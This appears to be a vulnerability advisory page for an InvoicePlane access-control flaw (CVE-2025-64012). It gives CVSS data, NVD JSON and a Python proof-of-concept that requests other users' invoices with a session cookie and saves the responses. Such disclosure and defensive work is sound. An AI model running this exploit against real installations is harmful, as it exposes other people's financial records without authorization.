Security Vulnerability Report
CVE-2025-64012 CVSS 4.3 MEDIUM

CVE-2025-64012

Published: 2025-12-16 16:15:59
Last Modified: 2025-12-31 00:39:06

Description

InvoicePlane commit debb446c is vulnerable to Incorrect Access Control. The invoices/view handler fails to verify ownership before returning invoice data.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:invoiceplane:invoiceplane:1.6.1:-:*:*:*:*:*:* - VULNERABLE
InvoicePlane versions before commit debb446c

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
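#!/usr/bin/env python3
"""
CVE-2025-64012 PoC - InvoicePlane Incorrect Access Control (CWE-639)

InvoicePlane's invoices/view handler fails to verify ownership before
returning invoice data: an authenticated user can request an invoice ID
that belongs to another user and receive its contents. Commit debb446c
is listed under References as the patch.

Notes for defenders:
  - The request this script sends is a single GET to
    ``invoices/view/<invoice_id>`` carrying an existing session cookie,
    so it looks like ordinary application traffic; the distinguishing
    feature in web-server/application logs is a session viewing invoice
    IDs it does not own.
  - The fix is server-side only: the handler must check that the invoice
    belongs to the requesting user before rendering it (the upstream
    patch). Client-side checks cannot mitigate this.
"""
import requests
import sys
from urllib.parse import urljoin


def exploit_invoiceplane(target_url, invoice_id, cookies=None):
    """
    Request ``invoices/view/<invoice_id>`` on an InvoicePlane instance.

    Args:
        target_url: Base URL of the InvoicePlane instance.
        invoice_id: Invoice ID to request (may belong to another user).
        cookies: Authentication cookies (session cookies), or None.

    Returns:
        The ``requests.Response`` for the request, whatever its status
        code, or None if the request itself failed (connection error,
        timeout, ...).
    """
    endpoint = f"invoices/view/{invoice_id}"
    # Guarantee exactly one slash between base URL and endpoint; without
    # the trailing '/', urljoin would replace the last path segment of
    # target_url instead of appending to it.
    full_url = urljoin(target_url.rstrip('/') + '/', endpoint)
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
    }
    try:
        # allow_redirects=False: a redirect to the login page must surface
        # as a 3xx rather than being followed to a 200 that looks like
        # success.
        response = requests.get(full_url, cookies=cookies, headers=headers,
                                timeout=10, allow_redirects=False)
    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None
    return response


def main():
    """
    CLI entry point: ``<target_url> <invoice_id> [session_cookie]``.

    The optional third argument is one ``NAME=VALUE`` cookie pair; a
    value without ``=`` is ignored and the request is sent with no
    cookies. Exits with status 1 when fewer than two arguments are given.
    """
    if len(sys.argv) < 3:
        print(f"Usage: python3 {sys.argv[0]} <target_url> <invoice_id> [session_cookie]")
        print(f"Example: python3 {sys.argv[0]} http://localhost:8080 1234 PHPSESSID=abc123")
        sys.exit(1)

    target_url = sys.argv[1]
    invoice_id = sys.argv[2]

    cookies = {}
    if len(sys.argv) > 3:
        cookie_str = sys.argv[3]
        if '=' in cookie_str:
            name, value = cookie_str.split('=', 1)
            cookies[name] = value

    print(f"[*] Targeting: {target_url}")
    print(f"[*] Attempting to access invoice ID: {invoice_id}")

    response = exploit_invoiceplane(target_url, invoice_id, cookies)
    # Bug fix: the original `if response:` used requests.Response.__bool__,
    # which is False for any 4xx/5xx status, so a 403/404 printed nothing
    # at all instead of reaching the "Unexpected status code" branch.
    # Only a failed request (None) should be skipped.
    if response is not None:
        print(f"[+] Status Code: {response.status_code}")
        if response.status_code == 200:
            # Heuristic only: this matches any page containing either
            # word, not specifically the requested invoice's data; confirm
            # manually against the saved response before reporting.
            body = response.text.lower()
            if 'invoice' in body or 'amount' in body:
                print("[!] VULNERABLE: Invoice data exposed without ownership verification!")
                print(f"[*] Response length: {len(response.text)} bytes")
                # Save response for analysis. Explicit UTF-8 so a non-ASCII
                # page body cannot raise UnicodeEncodeError under a narrow
                # platform default encoding.
                out_path = f'invoice_{invoice_id}_response.html'
                with open(out_path, 'w', encoding='utf-8') as f:
                    f.write(response.text)
                print(f"[*] Response saved to {out_path}")
            else:
                print("[-] No invoice data found in response")
        else:
            print(f"[-] Unexpected status code: {response.status_code}")


if __name__ == '__main__':
    main()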

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64012", "sourceIdentifier": "[email protected]", "published": "2025-12-16T16:15:59.177", "lastModified": "2025-12-31T00:39:06.250", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "InvoicePlane commit debb446c is vulnerable to Incorrect Access Control. The invoices/view handler fails to verify ownership before returning invoice data."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:invoiceplane:invoiceplane:1.6.1:-:*:*:*:*:*:*", "matchCriteriaId": "286B0215-2841-41B8-B0CB-50FC4C1B4134"}]}]}], "references": [{"url": "https://gist.github.com/tarekramm/797073e9ae991211ff2ae71ed1190c7d", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/InvoicePlane/InvoicePlane/commit/debb446ceaa84efc136987fc1e21b268f34e47b0", "source": "[email protected]", "tags": ["Patch"]}]}}